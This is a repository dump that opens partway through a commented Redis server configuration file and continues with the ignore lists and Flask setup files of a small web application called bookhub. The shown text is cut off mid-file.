625 | # Specifically Redis deletes objects independently of a user call in the 626 | # following scenarios: 627 | # 628 | # 1) On eviction, because of the maxmemory and maxmemory policy configurations, 629 | # in order to make room for new data, without going over the specified 630 | # memory limit. 631 | # 2) Because of expire: when a key with an associated time to live (see the 632 | # EXPIRE command) must be deleted from memory. 633 | # 3) Because of a side effect of a command that stores data on a key that may 634 | # already exist. For example the RENAME command may delete the old key 635 | # content when it is replaced with another one. Similarly SUNIONSTORE 636 | # or SORT with STORE option may delete existing keys. The SET command 637 | # itself removes any old content of the specified key in order to replace 638 | # it with the specified string. 639 | # 4) During replication, when a slave performs a full resynchronization with 640 | # its master, the content of the whole database is removed in order to 641 | # load the RDB file just transfered. 642 | # 643 | # In all the above cases the default is to delete objects in a blocking way, 644 | # like if DEL was called. However you can configure each case specifically 645 | # in order to instead release memory in a non-blocking way like if UNLINK 646 | # was called, using the following configuration directives: 647 | 648 | lazyfree-lazy-eviction no 649 | lazyfree-lazy-expire no 650 | lazyfree-lazy-server-del no 651 | slave-lazy-flush no 652 | 653 | ############################## APPEND ONLY MODE ############################### 654 | 655 | # By default Redis asynchronously dumps the dataset on disk. This mode is 656 | # good enough in many applications, but an issue with the Redis process or 657 | # a power outage may result into a few minutes of writes lost (depending on 658 | # the configured save points). 659 | # 660 | # The Append Only File is an alternative persistence mode that provides 661 | # much better durability. For instance using the default data fsync policy 662 | # (see later in the config file) Redis can lose just one second of writes in a 663 | # dramatic event like a server power outage, or a single write if something 664 | # wrong with the Redis process itself happens, but the operating system is 665 | # still running correctly. 666 | # 667 | # AOF and RDB persistence can be enabled at the same time without problems. 668 | # If the AOF is enabled on startup Redis will load the AOF, that is the file 669 | # with the better durability guarantees. 670 | # 671 | # Please check http://redis.io/topics/persistence for more information. 672 | 673 | appendonly no 674 | 675 | # The name of the append only file (default: "appendonly.aof") 676 | 677 | appendfilename "appendonly.aof" 678 | 679 | # The fsync() call tells the Operating System to actually write data on disk 680 | # instead of waiting for more data in the output buffer. Some OS will really flush 681 | # data on disk, some other OS will just try to do it ASAP. 682 | # 683 | # Redis supports three different modes: 684 | # 685 | # no: don't fsync, just let the OS flush the data when it wants. Faster. 686 | # always: fsync after every write to the append only log. Slow, Safest. 687 | # everysec: fsync only one time every second. Compromise. 688 | # 689 | # The default is "everysec", as that's usually the right compromise between 690 | # speed and data safety. 
It's up to you to understand if you can relax this to 691 | # "no" that will let the operating system flush the output buffer when 692 | # it wants, for better performances (but if you can live with the idea of 693 | # some data loss consider the default persistence mode that's snapshotting), 694 | # or on the contrary, use "always" that's very slow but a bit safer than 695 | # everysec. 696 | # 697 | # More details please check the following article: 698 | # http://antirez.com/post/redis-persistence-demystified.html 699 | # 700 | # If unsure, use "everysec". 701 | 702 | # appendfsync always 703 | appendfsync everysec 704 | # appendfsync no 705 | 706 | # When the AOF fsync policy is set to always or everysec, and a background 707 | # saving process (a background save or AOF log background rewriting) is 708 | # performing a lot of I/O against the disk, in some Linux configurations 709 | # Redis may block too long on the fsync() call. Note that there is no fix for 710 | # this currently, as even performing fsync in a different thread will block 711 | # our synchronous write(2) call. 712 | # 713 | # In order to mitigate this problem it's possible to use the following option 714 | # that will prevent fsync() from being called in the main process while a 715 | # BGSAVE or BGREWRITEAOF is in progress. 716 | # 717 | # This means that while another child is saving, the durability of Redis is 718 | # the same as "appendfsync none". In practical terms, this means that it is 719 | # possible to lose up to 30 seconds of log in the worst scenario (with the 720 | # default Linux settings). 721 | # 722 | # If you have latency problems turn this to "yes". Otherwise leave it as 723 | # "no" that is the safest pick from the point of view of durability. 724 | 725 | no-appendfsync-on-rewrite no 726 | 727 | # Automatic rewrite of the append only file. 728 | # Redis is able to automatically rewrite the log file implicitly calling 729 | # BGREWRITEAOF when the AOF log size grows by the specified percentage. 730 | # 731 | # This is how it works: Redis remembers the size of the AOF file after the 732 | # latest rewrite (if no rewrite has happened since the restart, the size of 733 | # the AOF at startup is used). 734 | # 735 | # This base size is compared to the current size. If the current size is 736 | # bigger than the specified percentage, the rewrite is triggered. Also 737 | # you need to specify a minimal size for the AOF file to be rewritten, this 738 | # is useful to avoid rewriting the AOF file even if the percentage increase 739 | # is reached but it is still pretty small. 740 | # 741 | # Specify a percentage of zero in order to disable the automatic AOF 742 | # rewrite feature. 743 | 744 | auto-aof-rewrite-percentage 100 745 | auto-aof-rewrite-min-size 64mb 746 | 747 | # An AOF file may be found to be truncated at the end during the Redis 748 | # startup process, when the AOF data gets loaded back into memory. 749 | # This may happen when the system where Redis is running 750 | # crashes, especially when an ext4 filesystem is mounted without the 751 | # data=ordered option (however this can't happen when Redis itself 752 | # crashes or aborts but the operating system still works correctly). 753 | # 754 | # Redis can either exit with an error when this happens, or load as much 755 | # data as possible (the default now) and start if the AOF file is found 756 | # to be truncated at the end. The following option controls this behavior. 
757 | # 758 | # If aof-load-truncated is set to yes, a truncated AOF file is loaded and 759 | # the Redis server starts emitting a log to inform the user of the event. 760 | # Otherwise if the option is set to no, the server aborts with an error 761 | # and refuses to start. When the option is set to no, the user requires 762 | # to fix the AOF file using the "redis-check-aof" utility before to restart 763 | # the server. 764 | # 765 | # Note that if the AOF file will be found to be corrupted in the middle 766 | # the server will still exit with an error. This option only applies when 767 | # Redis will try to read more data from the AOF file but not enough bytes 768 | # will be found. 769 | aof-load-truncated yes 770 | 771 | # When rewriting the AOF file, Redis is able to use an RDB preamble in the 772 | # AOF file for faster rewrites and recoveries. When this option is turned 773 | # on the rewritten AOF file is composed of two different stanzas: 774 | # 775 | # [RDB file][AOF tail] 776 | # 777 | # When loading Redis recognizes that the AOF file starts with the "REDIS" 778 | # string and loads the prefixed RDB file, and continues loading the AOF 779 | # tail. 780 | # 781 | # This is currently turned off by default in order to avoid the surprise 782 | # of a format change, but will at some point be used as the default. 783 | aof-use-rdb-preamble no 784 | 785 | ################################ LUA SCRIPTING ############################### 786 | 787 | # Max execution time of a Lua script in milliseconds. 788 | # 789 | # If the maximum execution time is reached Redis will log that a script is 790 | # still in execution after the maximum allowed time and will start to 791 | # reply to queries with an error. 792 | # 793 | # When a long running script exceeds the maximum execution time only the 794 | # SCRIPT KILL and SHUTDOWN NOSAVE commands are available. The first can be 795 | # used to stop a script that did not yet called write commands. The second 796 | # is the only way to shut down the server in the case a write command was 797 | # already issued by the script but the user doesn't want to wait for the natural 798 | # termination of the script. 799 | # 800 | # Set it to 0 or a negative value for unlimited execution without warnings. 801 | lua-time-limit 5000 802 | 803 | ################################ REDIS CLUSTER ############################### 804 | # 805 | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 806 | # WARNING EXPERIMENTAL: Redis Cluster is considered to be stable code, however 807 | # in order to mark it as "mature" we need to wait for a non trivial percentage 808 | # of users to deploy it in production. 809 | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 810 | # 811 | # Normal Redis instances can't be part of a Redis Cluster; only nodes that are 812 | # started as cluster nodes can. In order to start a Redis instance as a 813 | # cluster node enable the cluster support uncommenting the following: 814 | # 815 | # cluster-enabled yes 816 | 817 | # Every cluster node has a cluster configuration file. This file is not 818 | # intended to be edited by hand. It is created and updated by Redis nodes. 819 | # Every Redis Cluster node requires a different cluster configuration file. 820 | # Make sure that instances running in the same system do not have 821 | # overlapping cluster configuration file names. 
822 | # 823 | # cluster-config-file nodes-6379.conf 824 | 825 | # Cluster node timeout is the amount of milliseconds a node must be unreachable 826 | # for it to be considered in failure state. 827 | # Most other internal time limits are multiple of the node timeout. 828 | # 829 | # cluster-node-timeout 15000 830 | 831 | # A slave of a failing master will avoid to start a failover if its data 832 | # looks too old. 833 | # 834 | # There is no simple way for a slave to actually have an exact measure of 835 | # its "data age", so the following two checks are performed: 836 | # 837 | # 1) If there are multiple slaves able to failover, they exchange messages 838 | # in order to try to give an advantage to the slave with the best 839 | # replication offset (more data from the master processed). 840 | # Slaves will try to get their rank by offset, and apply to the start 841 | # of the failover a delay proportional to their rank. 842 | # 843 | # 2) Every single slave computes the time of the last interaction with 844 | # its master. This can be the last ping or command received (if the master 845 | # is still in the "connected" state), or the time that elapsed since the 846 | # disconnection with the master (if the replication link is currently down). 847 | # If the last interaction is too old, the slave will not try to failover 848 | # at all. 849 | # 850 | # The point "2" can be tuned by user. Specifically a slave will not perform 851 | # the failover if, since the last interaction with the master, the time 852 | # elapsed is greater than: 853 | # 854 | # (node-timeout * slave-validity-factor) + repl-ping-slave-period 855 | # 856 | # So for example if node-timeout is 30 seconds, and the slave-validity-factor 857 | # is 10, and assuming a default repl-ping-slave-period of 10 seconds, the 858 | # slave will not try to failover if it was not able to talk with the master 859 | # for longer than 310 seconds. 860 | # 861 | # A large slave-validity-factor may allow slaves with too old data to failover 862 | # a master, while a too small value may prevent the cluster from being able to 863 | # elect a slave at all. 864 | # 865 | # For maximum availability, it is possible to set the slave-validity-factor 866 | # to a value of 0, which means, that slaves will always try to failover the 867 | # master regardless of the last time they interacted with the master. 868 | # (However they'll always try to apply a delay proportional to their 869 | # offset rank). 870 | # 871 | # Zero is the only value able to guarantee that when all the partitions heal 872 | # the cluster will always be able to continue. 873 | # 874 | # cluster-slave-validity-factor 10 875 | 876 | # Cluster slaves are able to migrate to orphaned masters, that are masters 877 | # that are left without working slaves. This improves the cluster ability 878 | # to resist to failures as otherwise an orphaned master can't be failed over 879 | # in case of failure if it has no working slaves. 880 | # 881 | # Slaves migrate to orphaned masters only if there are still at least a 882 | # given number of other working slaves for their old master. This number 883 | # is the "migration barrier". A migration barrier of 1 means that a slave 884 | # will migrate only if there is at least 1 other working slave for its master 885 | # and so forth. It usually reflects the number of slaves you want for every 886 | # master in your cluster. 887 | # 888 | # Default is 1 (slaves migrate only if their masters remain with at least 889 | # one slave). 
To disable migration just set it to a very large value. 890 | # A value of 0 can be set but is useful only for debugging and dangerous 891 | # in production. 892 | # 893 | # cluster-migration-barrier 1 894 | 895 | # By default Redis Cluster nodes stop accepting queries if they detect there 896 | # is at least an hash slot uncovered (no available node is serving it). 897 | # This way if the cluster is partially down (for example a range of hash slots 898 | # are no longer covered) all the cluster becomes, eventually, unavailable. 899 | # It automatically returns available as soon as all the slots are covered again. 900 | # 901 | # However sometimes you want the subset of the cluster which is working, 902 | # to continue to accept queries for the part of the key space that is still 903 | # covered. In order to do so, just set the cluster-require-full-coverage 904 | # option to no. 905 | # 906 | # cluster-require-full-coverage yes 907 | 908 | # This option, when set to yes, prevents slaves from trying to failover its 909 | # master during master failures. However the master can still perform a 910 | # manual failover, if forced to do so. 911 | # 912 | # This is useful in different scenarios, especially in the case of multiple 913 | # data center operations, where we want one side to never be promoted if not 914 | # in the case of a total DC failure. 915 | # 916 | # cluster-slave-no-failover no 917 | 918 | # In order to setup your cluster make sure to read the documentation 919 | # available at http://redis.io web site. 920 | 921 | ########################## CLUSTER DOCKER/NAT support ######################## 922 | 923 | # In certain deployments, Redis Cluster nodes address discovery fails, because 924 | # addresses are NAT-ted or because ports are forwarded (the typical case is 925 | # Docker and other containers). 926 | # 927 | # In order to make Redis Cluster working in such environments, a static 928 | # configuration where each node knows its public address is needed. The 929 | # following two options are used for this scope, and are: 930 | # 931 | # * cluster-announce-ip 932 | # * cluster-announce-port 933 | # * cluster-announce-bus-port 934 | # 935 | # Each instruct the node about its address, client port, and cluster message 936 | # bus port. The information is then published in the header of the bus packets 937 | # so that other nodes will be able to correctly map the address of the node 938 | # publishing the information. 939 | # 940 | # If the above options are not used, the normal Redis Cluster auto-detection 941 | # will be used instead. 942 | # 943 | # Note that when remapped, the bus port may not be at the fixed offset of 944 | # clients port + 10000, so you can specify any port and bus-port depending 945 | # on how they get remapped. If the bus-port is not set, a fixed offset of 946 | # 10000 will be used as usually. 947 | # 948 | # Example: 949 | # 950 | # cluster-announce-ip 10.1.1.5 951 | # cluster-announce-port 6379 952 | # cluster-announce-bus-port 6380 953 | 954 | ################################## SLOW LOG ################################### 955 | 956 | # The Redis Slow Log is a system to log queries that exceeded a specified 957 | # execution time. 
The execution time does not include the I/O operations 958 | # like talking with the client, sending the reply and so forth, 959 | # but just the time needed to actually execute the command (this is the only 960 | # stage of command execution where the thread is blocked and can not serve 961 | # other requests in the meantime). 962 | # 963 | # You can configure the slow log with two parameters: one tells Redis 964 | # what is the execution time, in microseconds, to exceed in order for the 965 | # command to get logged, and the other parameter is the length of the 966 | # slow log. When a new command is logged the oldest one is removed from the 967 | # queue of logged commands. 968 | 969 | # The following time is expressed in microseconds, so 1000000 is equivalent 970 | # to one second. Note that a negative number disables the slow log, while 971 | # a value of zero forces the logging of every command. 972 | slowlog-log-slower-than 10000 973 | 974 | # There is no limit to this length. Just be aware that it will consume memory. 975 | # You can reclaim memory used by the slow log with SLOWLOG RESET. 976 | slowlog-max-len 128 977 | 978 | ################################ LATENCY MONITOR ############################## 979 | 980 | # The Redis latency monitoring subsystem samples different operations 981 | # at runtime in order to collect data related to possible sources of 982 | # latency of a Redis instance. 983 | # 984 | # Via the LATENCY command this information is available to the user that can 985 | # print graphs and obtain reports. 986 | # 987 | # The system only logs operations that were performed in a time equal or 988 | # greater than the amount of milliseconds specified via the 989 | # latency-monitor-threshold configuration directive. When its value is set 990 | # to zero, the latency monitor is turned off. 991 | # 992 | # By default latency monitoring is disabled since it is mostly not needed 993 | # if you don't have latency issues, and collecting data has a performance 994 | # impact, that while very small, can be measured under big load. Latency 995 | # monitoring can easily be enabled at runtime using the command 996 | # "CONFIG SET latency-monitor-threshold " if needed. 997 | latency-monitor-threshold 0 998 | 999 | ############################# EVENT NOTIFICATION ############################## 1000 | 1001 | # Redis can notify Pub/Sub clients about events happening in the key space. 1002 | # This feature is documented at http://redis.io/topics/notifications 1003 | # 1004 | # For instance if keyspace events notification is enabled, and a client 1005 | # performs a DEL operation on key "foo" stored in the Database 0, two 1006 | # messages will be published via Pub/Sub: 1007 | # 1008 | # PUBLISH __keyspace@0__:foo del 1009 | # PUBLISH __keyevent@0__:del foo 1010 | # 1011 | # It is possible to select the events that Redis will notify among a set 1012 | # of classes. Every class is identified by a single character: 1013 | # 1014 | # K Keyspace events, published with __keyspace@__ prefix. 1015 | # E Keyevent events, published with __keyevent@__ prefix. 1016 | # g Generic commands (non-type specific) like DEL, EXPIRE, RENAME, ... 1017 | # $ String commands 1018 | # l List commands 1019 | # s Set commands 1020 | # h Hash commands 1021 | # z Sorted set commands 1022 | # x Expired events (events generated every time a key expires) 1023 | # e Evicted events (events generated when a key is evicted for maxmemory) 1024 | # A Alias for g$lshzxe, so that the "AKE" string means all the events. 
1025 | # 1026 | # The "notify-keyspace-events" takes as argument a string that is composed 1027 | # of zero or multiple characters. The empty string means that notifications 1028 | # are disabled. 1029 | # 1030 | # Example: to enable list and generic events, from the point of view of the 1031 | # event name, use: 1032 | # 1033 | # notify-keyspace-events Elg 1034 | # 1035 | # Example 2: to get the stream of the expired keys subscribing to channel 1036 | # name __keyevent@0__:expired use: 1037 | # 1038 | # notify-keyspace-events Ex 1039 | # 1040 | # By default all notifications are disabled because most users don't need 1041 | # this feature and the feature has some overhead. Note that if you don't 1042 | # specify at least one of K or E, no events will be delivered. 1043 | notify-keyspace-events "" 1044 | 1045 | ############################### ADVANCED CONFIG ############################### 1046 | 1047 | # Hashes are encoded using a memory efficient data structure when they have a 1048 | # small number of entries, and the biggest entry does not exceed a given 1049 | # threshold. These thresholds can be configured using the following directives. 1050 | hash-max-ziplist-entries 512 1051 | hash-max-ziplist-value 64 1052 | 1053 | # Lists are also encoded in a special way to save a lot of space. 1054 | # The number of entries allowed per internal list node can be specified 1055 | # as a fixed maximum size or a maximum number of elements. 1056 | # For a fixed maximum size, use -5 through -1, meaning: 1057 | # -5: max size: 64 Kb <-- not recommended for normal workloads 1058 | # -4: max size: 32 Kb <-- not recommended 1059 | # -3: max size: 16 Kb <-- probably not recommended 1060 | # -2: max size: 8 Kb <-- good 1061 | # -1: max size: 4 Kb <-- good 1062 | # Positive numbers mean store up to _exactly_ that number of elements 1063 | # per list node. 1064 | # The highest performing option is usually -2 (8 Kb size) or -1 (4 Kb size), 1065 | # but if your use case is unique, adjust the settings as necessary. 1066 | list-max-ziplist-size -2 1067 | 1068 | # Lists may also be compressed. 1069 | # Compress depth is the number of quicklist ziplist nodes from *each* side of 1070 | # the list to *exclude* from compression. The head and tail of the list 1071 | # are always uncompressed for fast push/pop operations. Settings are: 1072 | # 0: disable all list compression 1073 | # 1: depth 1 means "don't start compressing until after 1 node into the list, 1074 | # going from either the head or tail" 1075 | # So: [head]->node->node->...->node->[tail] 1076 | # [head], [tail] will always be uncompressed; inner nodes will compress. 1077 | # 2: [head]->[next]->node->node->...->node->[prev]->[tail] 1078 | # 2 here means: don't compress head or head->next or tail->prev or tail, 1079 | # but compress all nodes between them. 1080 | # 3: [head]->[next]->[next]->node->node->...->node->[prev]->[prev]->[tail] 1081 | # etc. 1082 | list-compress-depth 0 1083 | 1084 | # Sets have a special encoding in just one case: when a set is composed 1085 | # of just strings that happen to be integers in radix 10 in the range 1086 | # of 64 bit signed integers. 1087 | # The following configuration setting sets the limit in the size of the 1088 | # set in order to use this special memory saving encoding. 1089 | set-max-intset-entries 512 1090 | 1091 | # Similarly to hashes and lists, sorted sets are also specially encoded in 1092 | # order to save a lot of space. 
This encoding is only used when the length and 1093 | # elements of a sorted set are below the following limits: 1094 | zset-max-ziplist-entries 128 1095 | zset-max-ziplist-value 64 1096 | 1097 | # HyperLogLog sparse representation bytes limit. The limit includes the 1098 | # 16 bytes header. When an HyperLogLog using the sparse representation crosses 1099 | # this limit, it is converted into the dense representation. 1100 | # 1101 | # A value greater than 16000 is totally useless, since at that point the 1102 | # dense representation is more memory efficient. 1103 | # 1104 | # The suggested value is ~ 3000 in order to have the benefits of 1105 | # the space efficient encoding without slowing down too much PFADD, 1106 | # which is O(N) with the sparse encoding. The value can be raised to 1107 | # ~ 10000 when CPU is not a concern, but space is, and the data set is 1108 | # composed of many HyperLogLogs with cardinality in the 0 - 15000 range. 1109 | hll-sparse-max-bytes 3000 1110 | 1111 | # Active rehashing uses 1 millisecond every 100 milliseconds of CPU time in 1112 | # order to help rehashing the main Redis hash table (the one mapping top-level 1113 | # keys to values). The hash table implementation Redis uses (see dict.c) 1114 | # performs a lazy rehashing: the more operation you run into a hash table 1115 | # that is rehashing, the more rehashing "steps" are performed, so if the 1116 | # server is idle the rehashing is never complete and some more memory is used 1117 | # by the hash table. 1118 | # 1119 | # The default is to use this millisecond 10 times every second in order to 1120 | # actively rehash the main dictionaries, freeing memory when possible. 1121 | # 1122 | # If unsure: 1123 | # use "activerehashing no" if you have hard latency requirements and it is 1124 | # not a good thing in your environment that Redis can reply from time to time 1125 | # to queries with 2 milliseconds delay. 1126 | # 1127 | # use "activerehashing yes" if you don't have such hard requirements but 1128 | # want to free memory asap when possible. 1129 | activerehashing yes 1130 | 1131 | # The client output buffer limits can be used to force disconnection of clients 1132 | # that are not reading data from the server fast enough for some reason (a 1133 | # common reason is that a Pub/Sub client can't consume messages as fast as the 1134 | # publisher can produce them). 1135 | # 1136 | # The limit can be set differently for the three different classes of clients: 1137 | # 1138 | # normal -> normal clients including MONITOR clients 1139 | # slave -> slave clients 1140 | # pubsub -> clients subscribed to at least one pubsub channel or pattern 1141 | # 1142 | # The syntax of every client-output-buffer-limit directive is the following: 1143 | # 1144 | # client-output-buffer-limit 1145 | # 1146 | # A client is immediately disconnected once the hard limit is reached, or if 1147 | # the soft limit is reached and remains reached for the specified number of 1148 | # seconds (continuously). 1149 | # So for instance if the hard limit is 32 megabytes and the soft limit is 1150 | # 16 megabytes / 10 seconds, the client will get disconnected immediately 1151 | # if the size of the output buffers reach 32 megabytes, but will also get 1152 | # disconnected if the client reaches 16 megabytes and continuously overcomes 1153 | # the limit for 10 seconds. 
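For illustration, the 32 MB hard / 16 MB soft / 10 second example just described maps onto the directive syntax above as `client-output-buffer-limit normal 32mb 16mb 10`, and the same value can also be applied at runtime with CONFIG SET. A minimal redis-py sketch (the connection URL is an assumption and the values are the worked example from the comment, not the defaults that follow):

```python
import redis

# Assumed local connection URL, for illustration only.
r = redis.StrictRedis.from_url('redis://localhost:6379/0')

# Hard limit 32mb, soft limit 16mb sustained for 10 seconds, for normal clients --
# the worked example from the comment above, not this file's default values.
r.config_set('client-output-buffer-limit', 'normal 32mb 16mb 10')

# Read the setting back to confirm it was applied.
print(r.config_get('client-output-buffer-limit'))
```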
1154 | # 1155 | # By default normal clients are not limited because they don't receive data 1156 | # without asking (in a push way), but just after a request, so only 1157 | # asynchronous clients may create a scenario where data is requested faster 1158 | # than it can read. 1159 | # 1160 | # Instead there is a default limit for pubsub and slave clients, since 1161 | # subscribers and slaves receive data in a push fashion. 1162 | # 1163 | # Both the hard or the soft limit can be disabled by setting them to zero. 1164 | client-output-buffer-limit normal 0 0 0 1165 | client-output-buffer-limit slave 256mb 64mb 60 1166 | client-output-buffer-limit pubsub 32mb 8mb 60 1167 | 1168 | # Client query buffers accumulate new commands. They are limited to a fixed 1169 | # amount by default in order to avoid that a protocol desynchronization (for 1170 | # instance due to a bug in the client) will lead to unbound memory usage in 1171 | # the query buffer. However you can configure it here if you have very special 1172 | # needs, such us huge multi/exec requests or alike. 1173 | # 1174 | # client-query-buffer-limit 1gb 1175 | 1176 | # In the Redis protocol, bulk requests, that are, elements representing single 1177 | # strings, are normally limited ot 512 mb. However you can change this limit 1178 | # here. 1179 | # 1180 | # proto-max-bulk-len 512mb 1181 | 1182 | # Redis calls an internal function to perform many background tasks, like 1183 | # closing connections of clients in timeout, purging expired keys that are 1184 | # never requested, and so forth. 1185 | # 1186 | # Not all tasks are performed with the same frequency, but Redis checks for 1187 | # tasks to perform according to the specified "hz" value. 1188 | # 1189 | # By default "hz" is set to 10. Raising the value will use more CPU when 1190 | # Redis is idle, but at the same time will make Redis more responsive when 1191 | # there are many keys expiring at the same time, and timeouts may be 1192 | # handled with more precision. 1193 | # 1194 | # The range is between 1 and 500, however a value over 100 is usually not 1195 | # a good idea. Most users should use the default of 10 and raise this up to 1196 | # 100 only in environments where very low latency is required. 1197 | hz 10 1198 | 1199 | # When a child rewrites the AOF file, if the following option is enabled 1200 | # the file will be fsync-ed every 32 MB of data generated. This is useful 1201 | # in order to commit the file to the disk more incrementally and avoid 1202 | # big latency spikes. 1203 | aof-rewrite-incremental-fsync yes 1204 | 1205 | # Redis LFU eviction (see maxmemory setting) can be tuned. However it is a good 1206 | # idea to start with the default settings and only change them after investigating 1207 | # how to improve the performances and how the keys LFU change over time, which 1208 | # is possible to inspect via the OBJECT FREQ command. 1209 | # 1210 | # There are two tunable parameters in the Redis LFU implementation: the 1211 | # counter logarithm factor and the counter decay time. It is important to 1212 | # understand what the two parameters mean before changing them. 1213 | # 1214 | # The LFU counter is just 8 bits per key, it's maximum value is 255, so Redis 1215 | # uses a probabilistic increment with logarithmic behavior. Given the value 1216 | # of the old counter, when a key is accessed, the counter is incremented in 1217 | # this way: 1218 | # 1219 | # 1. A random number R between 0 and 1 is extracted. 1220 | # 2. 
A probability P is calculated as 1/(old_value*lfu_log_factor+1). 1221 | # 3. The counter is incremented only if R < P. 1222 | # 1223 | # The default lfu-log-factor is 10. This is a table of how the frequency 1224 | # counter changes with a different number of accesses with different 1225 | # logarithmic factors: 1226 | # 1227 | # +--------+------------+------------+------------+------------+------------+ 1228 | # | factor | 100 hits | 1000 hits | 100K hits | 1M hits | 10M hits | 1229 | # +--------+------------+------------+------------+------------+------------+ 1230 | # | 0 | 104 | 255 | 255 | 255 | 255 | 1231 | # +--------+------------+------------+------------+------------+------------+ 1232 | # | 1 | 18 | 49 | 255 | 255 | 255 | 1233 | # +--------+------------+------------+------------+------------+------------+ 1234 | # | 10 | 10 | 18 | 142 | 255 | 255 | 1235 | # +--------+------------+------------+------------+------------+------------+ 1236 | # | 100 | 8 | 11 | 49 | 143 | 255 | 1237 | # +--------+------------+------------+------------+------------+------------+ 1238 | # 1239 | # NOTE: The above table was obtained by running the following commands: 1240 | # 1241 | # redis-benchmark -n 1000000 incr foo 1242 | # redis-cli object freq foo 1243 | # 1244 | # NOTE 2: The counter initial value is 5 in order to give new objects a chance 1245 | # to accumulate hits. 1246 | # 1247 | # The counter decay time is the time, in minutes, that must elapse in order 1248 | # for the key counter to be divided by two (or decremented if it has a value 1249 | # less <= 10). 1250 | # 1251 | # The default value for the lfu-decay-time is 1. A Special value of 0 means to 1252 | # decay the counter every time it happens to be scanned. 1253 | # 1254 | # lfu-log-factor 10 1255 | # lfu-decay-time 1 1256 | 1257 | ########################### ACTIVE DEFRAGMENTATION ####################### 1258 | # 1259 | # WARNING THIS FEATURE IS EXPERIMENTAL. However it was stress tested 1260 | # even in production and manually tested by multiple engineers for some 1261 | # time. 1262 | # 1263 | # What is active defragmentation? 1264 | # ------------------------------- 1265 | # 1266 | # Active (online) defragmentation allows a Redis server to compact the 1267 | # spaces left between small allocations and deallocations of data in memory, 1268 | # thus allowing to reclaim back memory. 1269 | # 1270 | # Fragmentation is a natural process that happens with every allocator (but 1271 | # less so with Jemalloc, fortunately) and certain workloads. Normally a server 1272 | # restart is needed in order to lower the fragmentation, or at least to flush 1273 | # away all the data and create it again. However thanks to this feature 1274 | # implemented by Oran Agra for Redis 4.0 this process can happen at runtime 1275 | # in an "hot" way, while the server is running. 1276 | # 1277 | # Basically when the fragmentation is over a certain level (see the 1278 | # configuration options below) Redis will start to create new copies of the 1279 | # values in contiguous memory regions by exploiting certain specific Jemalloc 1280 | # features (in order to understand if an allocation is causing fragmentation 1281 | # and to allocate it in a better place), and at the same time, will release the 1282 | # old copies of the data. This process, repeated incrementally for all the keys 1283 | # will cause the fragmentation to drop back to normal values. 1284 | # 1285 | # Important things to understand: 1286 | # 1287 | # 1. 
This feature is disabled by default, and only works if you compiled Redis 1288 | # to use the copy of Jemalloc we ship with the source code of Redis. 1289 | # This is the default with Linux builds. 1290 | # 1291 | # 2. You never need to enable this feature if you don't have fragmentation 1292 | # issues. 1293 | # 1294 | # 3. Once you experience fragmentation, you can enable this feature when 1295 | # needed with the command "CONFIG SET activedefrag yes". 1296 | # 1297 | # The configuration parameters are able to fine tune the behavior of the 1298 | # defragmentation process. If you are not sure about what they mean it is 1299 | # a good idea to leave the defaults untouched. 1300 | 1301 | # Enabled active defragmentation 1302 | # activedefrag yes 1303 | 1304 | # Minimum amount of fragmentation waste to start active defrag 1305 | # active-defrag-ignore-bytes 100mb 1306 | 1307 | # Minimum percentage of fragmentation to start active defrag 1308 | # active-defrag-threshold-lower 10 1309 | 1310 | # Maximum percentage of fragmentation at which we use maximum effort 1311 | # active-defrag-threshold-upper 100 1312 | 1313 | # Minimal effort for defrag in CPU percentage 1314 | # active-defrag-cycle-min 25 1315 | 1316 | # Maximal effort for defrag in CPU percentage 1317 | # active-defrag-cycle-max 75 1318 | -------------------------------------------------------------------------------- /2018/bookhub/rsync-exclude.txt: -------------------------------------------------------------------------------- 1 | __pycache__ 2 | *.pyc 3 | .idea 4 | .vscode 5 | venv 6 | .env 7 | db.sqlite3 8 | 9 | -------------------------------------------------------------------------------- /2018/bookhub/src/.gitignore: -------------------------------------------------------------------------------- 1 | db.sqlite3 2 | /venv/ 3 | .idea/ 4 | .env 5 | __pycache__ 6 | *.pyc -------------------------------------------------------------------------------- /2018/bookhub/src/app.py: -------------------------------------------------------------------------------- 1 | from bookhub import app, db 2 | import bookhub.commands 3 | import bookhub.models 4 | from bookhub.views import * 5 | 6 | 7 | app.register_blueprint(user_blueprint) 8 | app.register_blueprint(book_blueprint) 9 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/__init__.py: -------------------------------------------------------------------------------- 1 | import os 2 | import redis 3 | from flask_login import LoginManager 4 | from flask import Flask 5 | from flask_sqlalchemy import SQLAlchemy 6 | from flask_migrate import Migrate 7 | from flask_session import Session 8 | from flask_wtf.csrf import CSRFProtect 9 | 10 | 11 | base_dir = os.path.dirname(os.path.abspath(__file__)) 12 | rds = redis.StrictRedis.from_url(os.environ.get('REDIS_URL')) 13 | 14 | app = Flask(__name__) 15 | app.config['SECRET_KEY'] = os.environ['SECRET_KEY'] 16 | app.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL'] 17 | app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = os.environ.get('FLASK_DEBUG', False) in ('1', 'True') 18 | app.config['SESSION_COOKIE_NAME'] = 'bookhub-session' 19 | app.config['REMEMBER_COOKIE_NAME'] = 'bookhub-remember-me' 20 | app.config['REMEMBER_COOKIE_HTTPONLY'] = True 21 | app.config['SESSION_TYPE'] = 'redis' 22 | app.config['SESSION_KEY_PREFIX'] = 'bookhub:session:' 23 | app.config['SESSION_REDIS'] = rds 24 | 25 | db = SQLAlchemy(app) 26 | login_manager = LoginManager(app) 27 | migrate = Migrate(app, db) 28 
